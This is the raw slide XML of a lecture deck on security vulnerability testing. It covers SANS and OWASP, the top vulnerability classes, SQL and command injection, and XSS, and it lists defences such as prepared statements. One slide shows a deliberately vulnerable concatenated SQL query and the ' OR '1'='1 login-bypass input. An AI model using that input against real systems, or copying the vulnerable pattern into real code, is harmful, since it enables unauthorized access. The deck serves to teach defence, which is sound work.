          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular Software Attacks</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03358" y="2895600"/>
            <a:ext cx="3537284" cy="2800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799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Famous security breaches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ashley Madison data breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facebook bug that could have allowed for any photo on the site to be deleted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 8 characters that crash Skype</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Heartbleed Bug</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1026" name="Picture 2" descr="Heartbleed B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562" y="4903903"/>
            <a:ext cx="1488691" cy="18030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e/ec/Skype-icon-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0968" y="4195571"/>
            <a:ext cx="1103717" cy="1100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3.bp.blogspot.com/-kIbAdT1l3VE/Tz5RlgfndzI/AAAAAAAAEYQ/dPbJ0_9Jx4w/s1600/Cracked-Facebook-Logo-psd469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7173" y="2692418"/>
            <a:ext cx="1365654" cy="12154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mumbrella.asia/content/uploads/2013/09/Picture-3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270" y="949214"/>
            <a:ext cx="2520057" cy="123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623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52400"/>
            <a:ext cx="7162800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>            Popular Software Attacks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757363"/>
            <a:ext cx="8080868" cy="396716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09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8597" y="152400"/>
            <a:ext cx="7829204" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>            Popular Software Attacks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36" y="1005840"/>
            <a:ext cx="7161362" cy="5600185"/>
          </a:xfrm>
          <a:prstGeom prst="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47724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Organizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SANS (System Administration, Networking, and Security) Institute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Established in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1989</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> as a cooperative research and education organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Enables more than 165,000 security professionals, auditors, system administrators, and network administrators to share the lessons they are learning and find solutions to the challenges they face</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.sans.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for more 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239895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a:xfrm>
            <a:off x="293298" y="914400"/>
            <a:ext cx="8622101" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Vulnerability Testing – Main Concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Characteristics of a Secure Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat Modeling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools for Security Testing</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40400" y="4267200"/>
            <a:ext cx="2794000" cy="20116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077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Organizations [2]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>OWASP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Web Application Security Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Established in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>worldwide not-for-profit charitable organization focused on improving the security of software. Their mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for more 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2182800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SANS Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Most Dangerous Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unrestricted upload of dangerous file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL redirection to untrusted site (Open Redirect)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improper limitation of a pathname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183317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SANS Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Most Dangerous Vulnerabilities (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download of a code without integrity check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uncontrolled format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing or incorrect authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of hard-coded credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing encryption of sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution of unnecessary privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improper restriction of excessive authentication attempts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2800" y="4876800"/>
            <a:ext cx="1317332" cy="141446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663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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is SQL injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>code injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious code is inserted into strings </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Later passed to an instance of SQL Server for parsing and execution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57900" y="3886200"/>
            <a:ext cx="2209800" cy="23018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mygeekpal.com/wp-content/uploads/2009/05/sql-injection-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81554" y="4359275"/>
            <a:ext cx="1828800" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13782"/>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281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SQL Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337038" y="1066800"/>
            <a:ext cx="8686800" cy="553998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original SQL Query:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718038" y="1676400"/>
            <a:ext cx="7924800" cy="707886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1"/>
              <a:t>String sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND pass='" + password + "'“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="C:\Documents and Settings\mostafa.siraj\My Documents\Common Vulnerabilities Images\login_for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61940" y="4724399"/>
            <a:ext cx="2480897" cy="976675"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337038" y="2590800"/>
            <a:ext cx="8686800" cy="1015663"/>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Setting username to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>John</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; password to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>' OR '1'= '1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>produces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718038" y="3733800"/>
            <a:ext cx="7924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20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noProof="1"/>
              <a:t>String sqlQuery = SELECT * FROM user WHERE name = 'John' AND pass='' OR '1'='1'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337038" y="4724400"/>
            <a:ext cx="8686800" cy="1605568"/>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The result:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a user John exists – he is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>logged in without password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352606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DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Exploits of a M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89" y="2058359"/>
            <a:ext cx="8905823" cy="2741282"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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4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DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307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991537"/>
            <a:ext cx="9144000" cy="5884606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1374378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Preventing SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Prepared Statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate all of the user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove special characters from the user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never show SQL error messages to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use different field names for user interface and database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable all unused features of the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit user permissions for the database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200" y="1066800"/>
            <a:ext cx="1360264" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="octagon">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86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Command Injection</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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>OS command injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack occurs when an attacker attempts to execute system level commands through a vulnerable application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://cdn.cnet.com.au/story_media/339281482/protect-wifi-network_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26223"/>
            <a:ext cx="6324600" cy="3734663"/>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3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Command Injection (2)</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6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>However, commands are executed with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>same privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and environment as the application has</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="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309" y="4352682"/>
            <a:ext cx="3532909" cy="2352918"/>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1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219201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Vulnerability Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2667000"/>
            <a:ext cx="7924800" cy="569120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main Concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3078"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7000" y="3505200"/>
            <a:ext cx="3810000" cy="2859287"/>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97453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 Cross-site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is XSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser.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14700" y="3657600"/>
            <a:ext cx="2514600" cy="2746716"/>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893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XSS is dangerous?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealing other user’s cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keylogging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stealing their private information</a:t>
